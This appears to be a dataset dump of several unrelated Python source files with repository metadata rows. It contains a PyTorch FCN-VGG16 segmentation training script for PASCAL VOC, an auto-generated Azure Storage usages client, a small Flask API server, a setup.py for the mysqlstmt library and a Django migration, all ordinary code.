return torch.from_numpy(weight)
class FCN_vgg16(nn.Module):
def __init__(self, num_category):
super(FCN_vgg16, self).__init__()
model_ft = models.vgg16(pretrained=True)
features = list(model_ft.features.children())
conv1 = nn.Conv2d(3, 64, 3, 1, 100)
conv1.weight.data = features[0].weight.data
conv1.bias.data = features[0].bias.data
features[0] = conv1
features[4] = nn.MaxPool2d(2, 2, ceil_mode=True)
features[9] = nn.MaxPool2d(2, 2, ceil_mode=True)
features[16] = nn.MaxPool2d(2, 2, ceil_mode=True)
features[23] = nn.MaxPool2d(2, 2, ceil_mode=True)
features[30] = nn.MaxPool2d(2, 2, ceil_mode=True)
self.stage1 = nn.Sequential(*features[:17]) # 第一段
self.stage2 = nn.Sequential(*features[17:24]) # 第二段
self.stage3 = nn.Sequential(*features[24:]) # 第三段
#fc6, fc7
fc = list(model_ft.classifier.children())
fc6 = nn.Conv2d(512, 1024, 7)
fc7 = nn.Conv2d(1024, 1024, 1)
fc[0] = fc6
fc[3] = fc7
self.fc = nn.Sequential(*fc[:6])
self.scores1 = nn.Conv2d(1024, num_category, 1) #
self.scores2 = nn.Conv2d(512, num_category, 1)
self.scores3 = nn.Conv2d(256, num_category, 1)
for layer in [self.scores1, self.scores2, self.scores3]:
nn.init.kaiming_normal_(layer.weight, a=1)
nn.init.constant_(layer.bias, 0)
self.upsample_8x = nn.ConvTranspose2d(num_category, num_category, 16, 8, bias=False)
self.upsample_8x.weight.data = bilinear_kernel(num_category, num_category, 16) # 使用双线性 kernel
self.upsample_4x = nn.ConvTranspose2d(num_category, num_category, 4, 2, bias=False)
self.upsample_4x.weight.data = bilinear_kernel(num_category, num_category, 4) # 使用双线性 kernel
self.upsample_2x = nn.ConvTranspose2d(num_category, num_category, 4, 2, bias=False)
self.upsample_2x.weight.data = bilinear_kernel(num_category, num_category, 4) # 使用双线性 kernel
def forward(self, x):
h = self.stage1(x)
s1 = h # 1/8
h = self.stage2(h)
s2 = h # 1/16
h = self.stage3(h)
h = self.fc(h)
s3 = h # 1/32
s3 = self.scores1(s3)
s3 = self.upsample_2x(s3)
s2 = self.scores2(s2*1e-2)
s2 = s2[:, :, 5:5+s3.size()[2], 5:5+s3.size()[3]].contiguous()
s2 = s2 + s3
s2 = self.upsample_4x(s2)
s1 = self.scores3(s1*1e-4)
s1 = s1[:, :, 9:9+s2.size()[2], 9:9+s2.size()[3]].contiguous()
s = s1 + s2
s = self.upsample_8x(s)
s = s[:, :, 31:31+x.size()[2], 31:31+x.size()[3]].contiguous()
return s
def get_params(self, split):
for layer in self.modules():
if isinstance(layer, nn.Conv2d):
if split == 'weight':
yield layer.weight
else:
yield layer.bias
elif isinstance(layer, nn.ConvTranspose2d) and split == 'weight':
yield layer.weight
def fast_hist(label_pred, label_gt, num_category):
mask = (label_gt >= 0) & (label_gt < num_category) # include background
hist = np.bincount(
num_category * label_pred[mask] + label_gt[mask].astype(int),
minlength=num_category ** 2).reshape(num_category, num_category)
return hist
def evaluation_metrics(label_preds, label_gts, num_category):
"""Returns evaluation result.
- pixel accuracy
- mean accuracy
- mean IoU
- frequency weighted IoU
"""
hist = np.zeros((num_category, num_category))
for p, g in zip(label_preds,label_gts):
tmp = (g < 21)
hist += fast_hist(p[tmp], g[tmp], num_category)
acc = np.diag(hist).sum() / hist.sum()
with np.errstate(divide='ignore', invalid='ignore'):
macc = np.diag(hist) / hist.sum(axis=0)
macc = np.nanmean(macc)
with np.errstate(divide='ignore', invalid='ignore'):
iou = np.diag(hist) / (hist.sum(axis=0) + hist.sum(axis=1) - np.diag(hist))
miou = np.nanmean(iou)
freq = hist.sum(axis=0) / hist.sum()
fwiou = (freq[freq > 0] * iou[freq > 0]).sum()
return acc, macc, miou, fwiou
#%%
def main():
#%% Initialize
transforms_train = transforms.Compose([
ToTensor(),
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
transforms_val = transforms.Compose([
ToTensor(),
Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])
voc_data = {'train': VOCDataset(root_dir=voc_root, train=True,
trsf=transforms_train),
'val': VOCDataset(root_dir=voc_root, train=False,
trsf=transforms_val)}
dataloaders = {'train': DataLoader(voc_data['train'], batch_size=1,
shuffle=True, num_workers=4),
'val': DataLoader(voc_data['val'], batch_size=1,
shuffle=False, num_workers=4)} #
dataset_sizes = {x: len(voc_data[x]) for x in ['train', 'val']}
num_category = 20 + 1 #
myfcn = FCN_vgg16(num_category) #
num_epoch = 20 #
criterion = nn.NLLLoss(ignore_index=255)
# Observe that all parameters are being optimized
train_params = [{'params': myfcn.get_params('weight'), 'lr': 1e-4, 'weight_decay': 5e-4},
{'params': myfcn.get_params('bias'), 'lr': 2e-4, 'weight_decay': 0}] #
optimizer = optim.SGD(train_params, momentum=0.99) #
# (LR) Decreased by a factor of 10 every 2000 iterations
exp_lr_scheduler = lr_scheduler.StepLR(optimizer, step_size=2500, gamma=0.9) #
myfcn = nn.DataParallel(myfcn).cuda()
since = time.time()
#%% Train
for t in range(num_epoch): #
myfcn.train() # Set model to training mode
tbar = tqdm(dataloaders['train'])
running_loss = 0
# Iterate over data.
for i, sample in enumerate(tbar):
exp_lr_scheduler.step()
inputs, labels = sample['image'], sample['label']
inputs = inputs.cuda()
labels = labels.cuda()
# zero the parameter gradients
optimizer.zero_grad()
with torch.set_grad_enabled(True):
# forward
outputs = myfcn(inputs)
outputs = F.log_softmax(outputs, dim=1)
loss = criterion(outputs, labels.long())
# backward + optimize
loss.backward()
optimizer.step()
# statistics
running_loss += loss.item() * inputs.size(0)
train_loss = running_loss / dataset_sizes['train']
print('Training Results({}): '.format(t))
print('Loss: {:4f}'.format(train_loss))
#%% Save model
state = {'net':myfcn.state_dict(), 'optimizer':optimizer.state_dict(), 'num_epoch':num_epoch}
torch.save(state, os.path.join(datadir, 'myfcn.pth'))
#%% Evaluate
myfcn.eval() # Set model to evaluate mode
running_acc = 0
running_macc = 0
running_miou = 0
running_fwiou = 0
for sample in tqdm(dataloaders['val']):
inputs, labels = sample['image'], sample['label']
inputs = inputs.cuda()
labels = labels.cuda()
# forward
outputs = myfcn(inputs)
outputs = F.log_softmax(outputs, dim=1)
preds = outputs.data.cpu().numpy()
labels = labels.data.cpu().numpy()
h, w = labels.shape[1:]
ori_h, ori_w = preds.shape[2:]
preds = np.argmax(ndimage.zoom(preds, (1., 1., 1.*h/ori_h, 1.*w/ori_w), order=1), axis=1)
for pred, label in zip(preds, labels):
acc, macc, miou, fwiou = evaluation_metrics(pred, label, num_category)
running_acc += acc
running_macc += macc
running_miou += miou
running_fwiou += fwiou
val_acc = running_acc / dataset_sizes['val']
val_macc = running_macc / dataset_sizes['val']
val_miou = running_miou / dataset_sizes['val']
val_fwiou = running_fwiou / dataset_sizes['val']
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
print('Validation Results: ')
print('Pixel accuracy: {:4f}'.format(val_acc))
print('Mean accuracy: {:4f}'.format(val_macc))
print('Mean IoU: {:4f}'.format(val_miou))
print('frequency weighted IoU: {:4f}'.format(val_fwiou))
#%% Visualize
# RGB color for each class
colormap = [[0,0,0],[128,0,0],[0,128,0], [128,128,0], [0,0,128],
[128,0,128],[0,128,128],[128,128,128],[64,0,0],[192,0,0],
[64,128,0],[192,128,0],[64,0,128],[192,0,128],
[64,128,128],[192,128,128],[0,64,0],[128,64,0],
[0,192,0],[128,192,0],[0,64,128],[255, 255, 255]]
cm = np.array(colormap, dtype='uint8')
_, figs = plt.subplots(6, 3, figsize=(12, 10))
for t in range(6):
val_sample = voc_data['val'][t]
val_image = val_sample['image'].cuda()
val_label = val_sample['label']
val_output = myfcn(val_image.unsqueeze(0))
val_pred = val_output.max(dim=1)[1].squeeze(0).data.cpu().numpy()
val_label = val_label.long().data.numpy()
val_image = val_image.squeeze().data.cpu().numpy().transpose((1, 2, 0))
val_image = val_image * [0.229, 0.224, 0.225] + [0.485, 0.456, 0.406]
val_image *= 255
val_image = val_image.astype(np.uint8)
val_pred = cm[val_pred]
val_label[val_label==255] = 21
val_label = cm[val_label]
figs[t, 0].imshow(val_image)
figs[t, 0].axes.get_xaxis().set_visible(False)
figs[t, 0].axes.get_yaxis().set_visible(False)
figs[t, 1].imshow(val_label)
figs[t, 1].axes.get_xaxis().set_visible(False)
figs[t, 1].axes.get_yaxis().set_visible(False)
figs[t, 2].imshow(val_pred)
figs[t, 2].axes.get_xaxis().set_visible(False)
figs[t, 2].axes.get_yaxis().set_visible(False)
plt.savefig('val0_6.jpg')
#%%
if __name__ == '__main__':
main()
| 38.115819 | 102 | 0.573038 |
0a8d406c4a1864175bc2828bef0e797b9dca8231 | 5,335 | py | Python | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_02_01/operations/_usages_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_02_01/operations/_usages_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2021_02_01/operations/_usages_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class UsagesOperations(object):
"""UsagesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2021_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_by_location(
self,
location, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.UsageListResult"]
"""Gets the current usage count and the limit for the resources of the location under the
subscription.
:param location: The location of the Azure Storage resource.
:type location: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either UsageListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.storage.v2021_02_01.models.UsageListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.UsageListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-02-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_location.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'location': self._serialize.url("location", location, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('UsageListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_location.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/locations/{location}/usages'} # type: ignore
| 44.831933 | 146 | 0.652858 |
b4d6f91b8ed6c6dec41247d122d8ad6cf4c7e2f0 | 1,018 | py | Python | rdr_server/server.py | robabram/raw-data-repository-v2 | a8e1a387d9ea3e4be3ec44473d026e3218f23509 | [
"BSD-3-Clause"
] | null | null | null | rdr_server/server.py | robabram/raw-data-repository-v2 | a8e1a387d9ea3e4be3ec44473d026e3218f23509 | [
"BSD-3-Clause"
] | 2 | 2021-02-08T20:31:00.000Z | 2021-04-30T20:44:44.000Z | rdr_server/server.py | robabram/raw-data-repository-v2 | a8e1a387d9ea3e4be3ec44473d026e3218f23509 | [
"BSD-3-Clause"
] | null | null | null | #
# This file is subject to the terms and conditions defined in the
# file 'LICENSE', which is part of this source code package.
#
# TODO: Drop flask_restplus and switch to flask views
# TODO: http://flask.pocoo.org/docs/1.0/views/
# TODO: documentation https://dev.to/djiit/documenting-your-flask-powered-api-like-a-boss-9eo
from flask import Flask
from flask_restplus import Api, Resource
# import api namespaces
from rdr_server.api.hello_world import api as ns1
from rdr_server.api.internal import api as ns2
from rdr_server.api.calendar import api as ns3
# If `entrypoint` is not defined in app.yaml, App Engine will look for an app
# called `app` in `main.py`.
app = Flask(__name__)
app.config['ERROR_404_HELP'] = False
api = Api(app, version='0.1', title='A good test', description='A simple API test')
# Add name spaces
api.add_namespace(ns1)
api.add_namespace(ns2)
api.add_namespace(ns3)
@api.route('/_ah/warmup')
class HelloWorld(Resource):
def get(self):
return '{ "success": "true" }'
| 27.513514 | 93 | 0.739686 |
3f2f85ab693d1673daa1a21bfca490bcb657bfc7 | 1,036 | py | Python | setup.py | lovette/mysqlstmt | ef7fa56ee45046018d6a6cd2c64abce19a8b33a8 | [
"BSD-3-Clause"
] | null | null | null | setup.py | lovette/mysqlstmt | ef7fa56ee45046018d6a6cd2c64abce19a8b33a8 | [
"BSD-3-Clause"
] | null | null | null | setup.py | lovette/mysqlstmt | ef7fa56ee45046018d6a6cd2c64abce19a8b33a8 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
setup(
name='mysqlstmt',
version='1.0.1',
url='https://github.com/lovette/mysqlstmt',
download_url='https://github.com/lovette/mysqlstmt/archive/master.tar.gz',
license='BSD',
author='Lance Lovette',
author_email='lance.lovette@gmail.com',
description='Python library to build SQL statements for MySQL.',
long_description=open('README.md').read(),
packages=['mysqlstmt'],
install_requires=[],
tests_require=['nose'],
zip_safe=False,
platforms='any',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Database',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 33.419355 | 78 | 0.631274 |
96f5d2e26dd0359d3bad312da33bd8382a596b3f | 1,644 | py | Python | rooms/migrations/0003_auto_20200324_1450.py | covid-videoplattform/django-webfrontend | 63cd880d155bcf6549b5616be3c6d2a87d198106 | [
"MIT"
] | 1 | 2020-03-29T21:17:37.000Z | 2020-03-29T21:17:37.000Z | rooms/migrations/0003_auto_20200324_1450.py | covid-videoplattform/django-webfrontend | 63cd880d155bcf6549b5616be3c6d2a87d198106 | [
"MIT"
] | 15 | 2020-03-25T10:14:38.000Z | 2020-04-05T11:08:00.000Z | rooms/migrations/0003_auto_20200324_1450.py | covid-videoplattform/django-webfrontend | 63cd880d155bcf6549b5616be3c6d2a87d198106 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-03-24 14:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rooms', '0002_auto_20200324_1142'),
]
operations = [
migrations.AddField(
model_name='appointment',
name='last_modified',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='appointment',
name='description',
field=models.TextField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='appointment',
name='end_time',
field=models.DateTimeField(blank=True, null=True, verbose_name='end of appointment'),
),
migrations.AlterField(
model_name='appointment',
name='room_name',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='appointment',
name='staffmember',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='rooms.StaffMember'),
),
migrations.AlterField(
model_name='appointment',
name='start_time',
field=models.DateTimeField(blank=True, null=True, verbose_name='start of appointment'),
),
migrations.AlterField(
model_name='staffmember',
name='email',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| 32.88 | 129 | 0.596107 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.